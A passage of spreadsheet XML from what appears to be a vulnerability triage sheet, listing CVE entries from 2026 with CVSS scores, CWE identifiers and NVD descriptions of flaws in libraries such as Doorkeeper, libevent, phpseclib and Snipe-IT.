        <is>
          <t>CVE-2026-43980</t>
        </is>
      </c>
      <c r="D808" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E808" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F808" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr"/>
      <c r="L808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr"/>
      <c r="Q808" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R808" s="5" t="inlineStr">
        <is>
          <t>Malla is a web analyzer for Meshtastic networks based on MQTT data. Prior to commit 4086e2b5f61615a813b70b25bc76095083552135, code names (long_name, short_name) received via MQTT are stored in SQLite without sanitization and rendered into the DOM without escaping. Any participant on a public Meshtastic MQTT broker can set a malicious node name that executes JavaScript in the browser of every Malla dashboard visitor. Commit 4086e2b5f61615a813b70b25bc76095083552135 fixes the issue.</t>
        </is>
      </c>
      <c r="S808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43980</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44476</t>
        </is>
      </c>
      <c r="D809" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E809" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F809" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr"/>
      <c r="K809" s="5" t="inlineStr"/>
      <c r="L809" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr"/>
      <c r="Q809" s="5" t="inlineStr">
        <is>
          <t>CWE-1390, CWE-287</t>
        </is>
      </c>
      <c r="R809" s="5" t="inlineStr">
        <is>
          <t>Doorkeeper is an OAuth 2 provider for Ruby on Rails. In version 1.9.0, an attacker who knows only a dynamically registered client's client_id, which is public information, can authenticate as that client at the token endpoint and obtain an access token without providing its client_secret. This occurs because the Dynamic Client Registration feature creates applications with confidential: false hard-coded, even though the registration response returns a client_secret and advertises support for the client_secret_basic and client_secret_post authentication methods; since Doorkeeper treats a blank or missing secret as valid for non-confidential (public) clients, the secret is never verified. Only projects that have explicitly enabled Dynamic Client Registration, which is disabled by default, are affected. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="S809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44476</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53600</t>
        </is>
      </c>
      <c r="D810" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E810" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F810" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr"/>
      <c r="L810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P810" s="5" t="inlineStr"/>
      <c r="Q810" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-843</t>
        </is>
      </c>
      <c r="R810" s="5" t="inlineStr">
        <is>
          <t>async-tar is a tar archive reading/writing library for async Rust. Prior to version 0.6.1, async-tar mis-applies a buffered PAX size extension to an intermediary extension header (a GNU longname L, a GNU longlink K, or a PAX x/g header) instead of to the next file entry. POSIX requires a PAX extended-header record set to describe the next file entry, never an intervening extension header. Because poll_next_raw (src/archive.rs) threads the buffered PAX records into the size computation of whatever raw header it reads next — and that header can be an intermediary L — the stream cursor is advanced by an attacker-chosen amount when the L body is consumed. The parser then desyncs relative to a POSIX-correct tar parser (e.g. GNU tar), reading subsequent bytes at the wrong block boundary. This issue has been patched in version 0.6.1.</t>
        </is>
      </c>
      <c r="S810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53600</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63379</t>
        </is>
      </c>
      <c r="D811" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E811" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F811" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr"/>
      <c r="L811" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P811" s="5" t="inlineStr"/>
      <c r="Q811" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R811" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent processes chunked HTTP trailers in http.c through evhttp_read_trailer and merges them into request headers. The fix introduces evhttp_parse_headers_impl_ and a temporary trailer header list. An unauthenticated remote attacker can place security-sensitive fields in trailers so that an upstream proxy and the libevent application interpret different effective headers, enabling header smuggling, authorization bypass, proxy-header spoofing, or cache poisoning. The fix parses trailers into a temporary header list and discards them instead of merging them into req-&gt;input_headers. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63379</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79973</t>
        </is>
      </c>
      <c r="D812" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E812" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F812" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr"/>
      <c r="Q812" s="5" t="inlineStr">
        <is>
          <t>CWE-567</t>
        </is>
      </c>
      <c r="R812" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Unsynchronized Access to Shared Data in a Multithreaded Context vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="S812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79973</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84308</t>
        </is>
      </c>
      <c r="D813" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E813" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F813" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr"/>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr"/>
      <c r="Q813" s="5" t="inlineStr">
        <is>
          <t>CWE-208, CWE-385</t>
        </is>
      </c>
      <c r="R813" s="5" t="inlineStr">
        <is>
          <t>phpseclib is a PHP secure communications library. Prior to 3.0.57 and 4.0.1, pure-PHP X25519 scalar multiplication in phpseclib/Math/PrimeField/Integer.php performs data-dependent conditional modular reductions in add() and subtract(). During the Montgomery ladder in phpseclib/Crypt/EC/BaseCurves/Montgomery.php, the reduction behavior of each step depends on the secret scalar prefix, creating per-step timing and libgmp call-count observations that can reveal a reused 251-bit clamped private scalar. The phpseclib/Crypt/EC/Formats/Keys/MontgomeryPrivate.php derivation path invokes the pure-PHP multiplication without a native-engine check, while phpseclib/Crypt/EC/Formats/Keys/PKCS8.php reaches it when ext-sodium is unavailable. Exploitation requires a reused or long-lived X25519 private key, knowledge of the corresponding public key, execution of the pure-PHP path, and a local observer capable of resolving individual ladder steps or libgmp entry-point calls. Ephemeral X25519 keys, including phpseclib's normal SSH exchange path, are not affected. Recovery of the scalar permanently compromises operations that reuse that key. This issue is fixed in versions 3.0.57 and 4.0.1.</t>
        </is>
      </c>
      <c r="S813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84308</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86203</t>
        </is>
      </c>
      <c r="D814" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E814" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F814" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr"/>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr"/>
      <c r="Q814" s="5" t="inlineStr">
        <is>
          <t>CWE-664</t>
        </is>
      </c>
      <c r="R814" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.39.2 fail to validate entity despawn state when processing attack packets from clients. Attackers can exploit a race condition by attacking a disconnecting player to trigger multiple death handlers, causing inventory items and experience to drop multiple times for duplication.</t>
        </is>
      </c>
      <c r="S814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86203</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86749</t>
        </is>
      </c>
      <c r="D815" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E815" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L815" s="5" t="inlineStr"/>
      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr"/>
      <c r="Q815" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="R815" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions &lt;= 8.6.3 (fixed in 8.7.0) do not check the return value of storage write operations in ImageUploadRequest::handleImages(). Because Laravel's default disk mode does not throw on failure, a silently failed Storage::disk('public')-&gt;put(...) call still caused the application to delete the previous image via deleteExistingImage() and to reassign and persist the model's image reference to the new filename, destroying the existing image and leaving the database row pointing at a file that was never written. A mirror problem existed in deleteExistingImage(), where a failed Storage::delete() still nulled the model's image field, orphaning the file on disk. The condition is not directly attacker-controlled: it is triggered when any legitimate authenticated user submits an image upload while the storage backend transiently fails (for example an S3 network error, a local filesystem permission problem, or quota exhaustion). The result is unrecoverable loss of the prior image and a durable inconsistency between the database and disk that requires manual reconciliation. All models whose controllers route through ImageUploadRequest::handleImages (assets, asset models, users, companies, manufacturers, locations, categories, suppliers, departments, and other image-carrying models) are affected.</t>
        </is>
      </c>
      <c r="S815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86749</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86774</t>
        </is>
      </c>
      <c r="D816" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E816" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr"/>
      <c r="Q816" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R816" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain a broken access control vulnerability in AssetModelPolicy where the files() method cascades from assets.files permission, allowing authenticated users to upload and delete file attachments on Asset Model records without the required models.files permission. Attackers with only assets.files permission can mutate shared model file attachments across company boundaries and bypass the dedicated models.files permission intended to restrict file management on the shared Asset Model catalog.</t>
        </is>
      </c>
      <c r="S816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86774</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87047</t>
        </is>
      </c>
      <c r="D817" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E817" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F817" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L817" s="5" t="inlineStr"/>
      <c r="M817" s="5" t="inlineStr"/>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P817" s="5" t="inlineStr"/>
      <c r="Q817" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R817" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87047</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41987</t>
        </is>
      </c>
      <c r="D818" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E818" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F818" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr"/>
      <c r="L818" s="5" t="inlineStr"/>
      <c r="M818" s="5" t="inlineStr"/>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P818" s="5" t="inlineStr"/>
      <c r="Q818" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R818" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the app management module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="S818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41987</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49311</t>
        </is>
      </c>
      <c r="D819" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E819" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F819" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr"/>
      <c r="K819" s="5" t="inlineStr"/>
      <c r="L819" s="5" t="inlineStr"/>
      <c r="M819" s="5" t="inlineStr"/>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P819" s="5" t="inlineStr"/>
      <c r="Q819" s="5" t="inlineStr">
        <is>
          <t>CWE-275</t>
        </is>
      </c>
      <c r="R819" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the event notification module.Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="S819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49311</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53937</t>
        </is>
      </c>
      <c r="D820" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E820" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F820" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I820" s="5" t="inlineStr"/>
      <c r="J820" s="5" t="inlineStr"/>
      <c r="K820" s="5" t="inlineStr"/>
      <c r="L820" s="5" t="inlineStr"/>
      <c r="M820" s="5" t="inlineStr"/>
      <c r="N820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O820" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P820" s="5" t="inlineStr"/>
      <c r="Q820" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R820" s="5" t="inlineStr">
        <is>
          <t>MCP Kotlin SDK is the Kotlin Multiplatform software development kit for the Model Context Protocol. In versions 0.7.0 through 0.12.0, `ReadBuffer.append` in `kotlin-sdk-core/src/commonMain/kotlin/io/modelcontextprotocol/kotlin/sdk/shared/ReadBuffer.kt` writes every chunk of bytes received from the stdio transport into a `kotlinx.io.Buffer` with no size cap. Frames are extracted from that buffer only when a `\n` (0x0a) byte is observed. A peer that streams bytes without ever sending a newline causes the internal buffer to grow indefinitely until the JVM (or the surrounding host process) is OOM-killed. The leak is amplified by `StdioServerTransport` and `StdioClientTransport`, which both queue raw chunks through a `kotlinx.coroutines.channels.Channel&lt;ByteArray&gt;(Channel.UNLIMITED)` and then call `readBuffer.append(chunk)` without backpressure or size guard. This is a remote-pre-auth denial of service whenever an SDK stdio server's stdin is fed by an untrusted or attacker-controlled producer (for example: a host program that exec's the MCP server as a subprocess and pipes through bytes received from a network peer, or a sidecar wrapper that proxies bytes from an HTTP endpoint to the stdio transport). Version 0.13.0 fixes the issue.</t>
        </is>
      </c>
      <c r="S820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53937</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55373</t>
        </is>
      </c>
      <c r="D821" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E821" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F821" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G821" s="5" t="inlineStr"/>
      <c r="H821" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I821" s="5" t="inlineStr"/>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr"/>
      <c r="L821" s="5" t="inlineStr"/>
      <c r="M821" s="5" t="inlineStr"/>
      <c r="N821" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O821" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P821" s="5" t="inlineStr"/>
      <c r="Q821" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="R821" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions prior to 3.2.10, 3.3.12, and 3.4.13 contain an infinite-loop vulnerability in SampleCountChannel. The helper roundListSizeUp() rounds a sample-list size up to the next power of two using repeated unsigned left shifts, which terminates for normal values but fails for UINT_MAX: the sequence reaches 0x80000000, and the next left shift wraps the 32-bit value to 0. Because 0 remains less than UINT_MAX, the loop never progresses and never exits. The bug is reachable through public OpenEXRUtil APIs, either by editing the sample-count buffer through SampleCountChannel::Edit (whose destructor calls endEdit()) or by calling SampleCountChannel::set(x, y, UINT_MAX) on a valid pixel. This issue has been fixed in versions 3.2.10, 3.3.12, and 3.4.13.</t>
        </is>
      </c>
      <c r="S821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55373</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71429</t>
        </is>
      </c>
      <c r="D822" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="E822" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F822" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I822" s="5" t="inlineStr"/>
      <c r="J822" s="5" t="inlineStr"/>
      <c r="K822" s="5" t="inlineStr"/>
      <c r="L822" s="5" t="inlineStr"/>
      <c r="M822" s="5" t="inlineStr"/>
      <c r="N822" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O822" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P822" s="5" t="inlineStr"/>
      <c r="Q822" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R822" s="5" t="inlineStr">
        <is>
          <t>stream-json is a micro-library of stream components for processing JSON and JSONC with a minimal memory footprint. Prior to 3.5.0, the path filters pick, ignore, filter, and replace in src/core/filters/filter-base.js recompute the full path string from the nesting stack for every checkable token. Because the stack length equals the current nesting depth and a checkable token is emitted at every level, a depth D document costs O(D²) rather than O(D) to process. The issue is triggered by nesting depth rather than byte volume, including the documented pick({filter: 'data'}) traversal-until-match path, so an application that sends untrusted JSON through a string or RegExp filter can block the Node.js event loop and cause denial of service with a small deeply nested document. The streamArray, streamObject, and streamValues streamers are not affected because they use the constant-time asm.depth getter. This issue is fixed in version 3.5.0.</t>
        </is>
      </c>
      <c r="S822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71429</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
